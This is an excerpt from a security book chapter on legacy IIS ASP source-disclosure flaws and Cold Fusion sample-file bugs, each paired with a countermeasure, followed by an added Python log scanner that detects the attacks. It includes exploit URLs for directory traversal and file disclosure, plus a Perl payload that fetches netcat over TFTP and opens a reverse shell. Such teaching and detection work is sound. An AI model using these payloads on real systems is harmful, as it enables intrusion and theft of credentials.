Active Server Pages (ASP) Vulnerabilities

Part of the document network security secrets and solutions scambray mcclure part 9 ppt (Pages 28 - 36)

Popularity: 8
Simplicity: 9
Impact: 5
Risk Rating: 7

Active Server Pages (ASP) is Microsoft’s answer to the scripting world of Perl and CGI on UNIX. Usually written in VBScript, the code can perform much of what’s needed to maintain state, provide back-end database access, and generally display HTML in the browser. One of the nice features of ASP is its ability to output an HTML file on the fly. One of the less-than-nice features is its numerous vulnerabilities that allow attackers to view the ASP code itself. Why is this bad? First, attackers can learn further vulnerabilities in program logic, and second, attackers can view sensitive information kept in ASP files, like database usernames and passwords.

ASP Dot Bug Vulnerability

Weld of the L0pht group discovered the ASP dot bug in 1997. The vulnerability involved being able to reveal ASP source code to attackers. By appending one or more dots to the end of an ASP URL under IIS 3.0, it was possible to view the ASP source code, thereby revealing its program logic and, more importantly, sensitive information such as usernames and passwords for database authentication. The exploit worked by adding a dot to the end of the URL:

http://192.168.51.101/code/example.asp.

For more information about this vulnerability, check out http://oliver.efri.hr/~crv/security/bugs/NT/asp.html.

ASP Dot Bug Countermeasure

The good news is that Microsoft provided a fix to the dot vulnerability—a hotfix patch for IIS 3.0. You can find the patch at ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security/fesrc-fix/.

The bad news is that the patch introduced another vulnerability. By replacing the period in the filename “example.asp” with its hexadecimal representation (0x2e), attackers can once again download the source code of the ASP file. For example, attackers would request the following to further exploit the vulnerability:

http://192.168.51.101/code/example%2easp

ASP Alternate Data Streams Vulnerability

Originally posted to Bugtraq by Paul Ashton, this vulnerability was a natural follow-up to the ASP dot bug, and it likewise allowed attackers to download the ASP source of your web pages. The exploit was easy and quite popular with the script kiddies. Simply use the following URL format on a discovered ASP page:

http://192.168.51.101/scripts/file.asp::$DATA

If the exploit works, your Netscape browser will then prompt you for a location to save the file. Internet Explorer, by default, will display the source in the browser window. Save it and view the source in your favorite text editor. For more information regarding this vulnerability, you can check out http://www.rootshell.com.

ASP Alternate Data Stream Countermeasure

The fix for IIS 3.0 can be found at ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security/iis3-datafix/, and the fix for IIS 4.0 can be found at ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security/iis4-datafix/.

The work-around is to limit the file access rights of all source code by removing the read access of the Everyone group. In the end, your source code only needs execute permission.

Showcode.asp and codebrws.asp Vulnerability

The last file viewing vulnerability we’ll discuss affects IIS 4.0 and again allows attackers to download ASP source code. The difference with this vulnerability is that it wasn’t a bug per se, but more an example of poor programming. When you choose to install sample ASP code during a default installation of IIS 4.0, a number of poorly programmed sample files allow attackers to download another file’s source. The problem lies in the script’s failure to restrict the use of “..” in the file’s path. For example, the following showcode.asp exploit will display the boot.ini file on affected systems (with liberal access controls, any file can be viewed with this exploit):

http://192.168.51.101/msadc/Samples/SELECTOR/showcode.asp?source=/../../../../../boot.ini

As with the showcode.asp vulnerability, the codebrws.asp file lets you view any file on the local drive. As we discuss in Chapter 13, “Remote Control Insecurities,” we can find the CIF files of pcAnywhere users:

http://192.168.51.101/iissamples/exair/howitworks/codebrws.asp?source=/../../../../../winnt/repair/setup.log

With both the showcode.asp and codebrws.asp vulnerabilities, it is impossible to correctly download binary files from the target system. This is because the ASP script performs character translation on the file it returns. The translation of characters in a file like SAM._ will corrupt it and make it unusable; however, it may not stop a skilled hacker from reconstructing the structure of the SAM file and using the information retrieved.

Showcode.asp et al. Countermeasure

The fix to the previously mentioned problems is to install a hotfix to IIS. The patch and the relevant Knowledge Base article (Q232449) can be found at ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/Viewcode-fix/.

Webhits.dll Vulnerability

A series of file-viewing vulnerabilities comes from the Cerberus Information Security team and involves an ISAPI application: webhits.dll. The DLL provides hit-highlighting functionality for MS Index Server. However, an attack is possible that allows an attacker to view sensitive ASP source code (or anything else on the drive). The first .HTW attack works by using an existing .HTW file to view source:

http://192.168.51.101/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/repair/setup.log&CiRestriction=none&CiHiliteType=Full

The second .HTW attack works by submitting the name of a file that does not exist on the system. Using an existing file as the base, and over 230 spaces (%20) between the real file (default.asp) and the .HTW extension, the web service (inetinfo) will forgo the extension (.HTW) and serve up any file on the system for the attacker:

http://192.168.51.101/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiWebHitsFile=/../../../../../test.txt&CiRestriction=none&CiHiliteType=Full

The third .HTW attack works by using the null.htw filename to deliver raw files to the browser:

http://192.168.51.101/null.htw?CiWebHitsFile=/../../../../../winnt/repair/setup.log&CiRestriction=none&CiHiliteType=Full

The preceding URL syntax will force the IIS web server to cough up the /winnt/repair/setup.log file on the system.

Webhits.dll Countermeasure

The work-around for the webhits.dll vulnerability is to remove the application mapping for the .HTW extension. To do this, select the master properties of the vulnerable server and select Edit for the “WWW Service.” Now click the Home Directory tab, and click the Configuration button within the Application Settings group. You should see the following screen:

Simply click on the .HTW application mapping and click the Remove button. Once you remove the application mapping of .HTW to \winnt\system32\webhits.dll, the web server will no longer call webhits.dll, which eliminates the vulnerability.

Cold Fusion Vulnerabilities

Popularity: 9
Simplicity: 9
Impact: 8
Risk Rating: 9

The L0pht discovered a number of significant vulnerabilities in the Allaire product Cold Fusion Application Server, allowing remote command execution on a vulnerable web server. When installed, the product places example code and online documentation on the server. The problem lies in a number of these sample code files, as they do not limit their interaction to localhost only.

The first problem lies in the openfile.cfm file installed by default, which allows attackers to upload any file to the web server. Openfile.cfm performs the upload of the local file to the target web server, while displayopenedfile.cfm actually displays the file in your browser. Then exprcalc.cfm evaluates the uploaded file and deletes it (or is supposed to). Using openfile.cfm alone, you can trick the system into not deleting an uploaded file and then subsequently run any command on the local system. To exploit this vulnerability, follow these steps:

1. Craft a file that, when run on the remote web server, will run a local command. For example, we prefer Perl scripts when available, so we will create a file called “test.pl” and put our favorite lines in it:

system("tftp -i 192.168.51.100 GET nc.exe");

system("nc -e cmd.exe 192.168.51.100 3000");

This will work assuming there is a Perl interpreter present on the Cold Fusion Application Server.

2. Point your browser to the following URL:

http://192.168.51.101/cfdocs/expeval/openfile.cfm

3. Insert your handcrafted file in the Open File field and click OK.

You should see something like the following:

4. In the URL, replace D:\INETPUB\WWWROOT\cfdocs\expeval\test.pl with the name and location of the file that deletes the uploaded files, exprcalc.cfm. After you make the change, the URL should read:

http://192.168.51.101/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=D:\INETPUB\WWWROOT\cfdocs\expeval\exprcalc.cfm

5. You should receive the contents of exprcalc.cfm in the window, and it should be deleted from the system. Now all files uploaded with openfile.cfm will remain on the remote system.

6. Reload test.pl onto the remote system with the same steps outlined earlier. Once complete, your file (test.pl) will be uploaded and awaiting your call.

7. Run the test.pl file by calling it with a URL:

http://192.168.51.101/cfdocs/expeval/test.pl

8. If you had your TFTP server and your netcat listener running ahead of time, you should see the following “Administrator” prompt:

C:\>nc -l -p 3000

Microsoft(R) Windows NT(TM)

(C) Copyright 1985-1996 Microsoft Corp.

D:\INETPUB\WWWROOT\cfdocs>

Cold Fusion Countermeasures

There are two ways to prevent exploitation of Cold Fusion’s vulnerabilities:

▼ Remove the affected scripts.

▲ Apply the Allaire patch for the exprcalc.cfm vulnerability. It can be found at http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full.
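As an added defensive example (not from the book or from any of the vendors named here): a small Python scanner that reads constructed W3C-format IIS log lines and flags the request shapes this chapter describes (trailing dot and %2e on .asp files, the ::$DATA stream, the showcode.asp/codebrws.asp viewers with “..” in their source parameter, .HTW hit-highlighting requests with traversal or space-padded names, and requests into the Cold Fusion cfdocs/expeval samples). The log layout, the rule names and every sample line are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed W3C-style IIS log lines (date time c-ip method cs-uri-stem cs-uri-query status);
# the request shapes follow this section, the hosts and file names are the chapter's examples.
SAMPLE_LOG = """\
1999-07-01 10:00:01 192.168.51.100 GET /code/example.asp. - 200
1999-07-01 10:00:02 192.168.51.100 GET /code/example%2easp - 200
1999-07-01 10:00:03 192.168.51.100 GET /scripts/file.asp::$DATA - 200
1999-07-01 10:00:04 192.168.51.100 GET /msadc/Samples/SELECTOR/showcode.asp source=/../../../../../boot.ini 200
1999-07-01 10:00:05 192.168.51.100 GET /null.htw CiWebHitsFile=/../../../../../winnt/repair/setup.log&CiRestriction=none 200
1999-07-01 10:00:06 192.168.51.100 GET /default.asp%20%20%20%20.htw CiWebHitsFile=/../../test.txt 200
1999-07-01 10:00:07 192.168.51.100 GET /cfdocs/expeval/ExprCalc.cfm OpenFilePath=D:\\INETPUB\\WWWROOT\\cfdocs\\expeval\\exprcalc.cfm 200
1999-07-01 10:00:08 192.168.51.100 GET /default.asp - 200
1999-07-01 10:00:09 192.168.51.100 GET /products/list.asp id=3 200
"""

# Each rule sees the raw (still URL-encoded) stem, the decoded lower-cased stem and the decoded query.
RULES = [
    ("asp-trailing-dot", lambda raw, s, q: re.search(r"\.asp\.+$", s) is not None),
    ("asp-encoded-dot", lambda raw, s, q: "%2e" in raw.lower()),
    ("asp-ads-data", lambda raw, s, q: "::$data" in s),
    ("sample-viewer", lambda raw, s, q: s.endswith(("/showcode.asp", "/codebrws.asp")) and ".." in q),
    ("htw-traversal", lambda raw, s, q: s.endswith(".htw") and "ciwebhitsfile=" in q and ".." in q),
    ("htw-padded-name", lambda raw, s, q: re.search(r"\s+\.htw$", s) is not None),
    ("cf-expeval-sample", lambda raw, s, q: "/cfdocs/expeval/" in s),
    ("cf-exprcalc-path", lambda raw, s, q: s.endswith("/exprcalc.cfm") and "openfilepath=" in q),
]

def classify(line):
    """Return the names of the rules one log line trips (empty list when it is clean)."""
    fields = line.split()
    if len(fields) < 6:
        return []
    raw_stem, raw_query = fields[4], fields[5]
    stem = unquote(raw_stem).lower()
    query = "" if raw_query == "-" else unquote(raw_query).lower()
    return [name for name, pred in RULES if pred(raw_stem, stem, query)]

def scan(log_text):
    """Return (line_number, raw_stem, matched_rules) for every line that trips at least one rule."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        matched = classify(line)
        if matched:
            hits.append((n, line.split()[4], matched))
    return hits

if __name__ == "__main__":
    for n, stem, rules in scan(SAMPLE_LOG):
        print(f"line {n}: {stem} -> {', '.join(rules)}")
```

Decoding the stem before matching is what catches the %2e and space-padded .HTW variants; the encoded-dot rule deliberately inspects the raw stem, since the dot is only suspicious while it is still hex-encoded.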
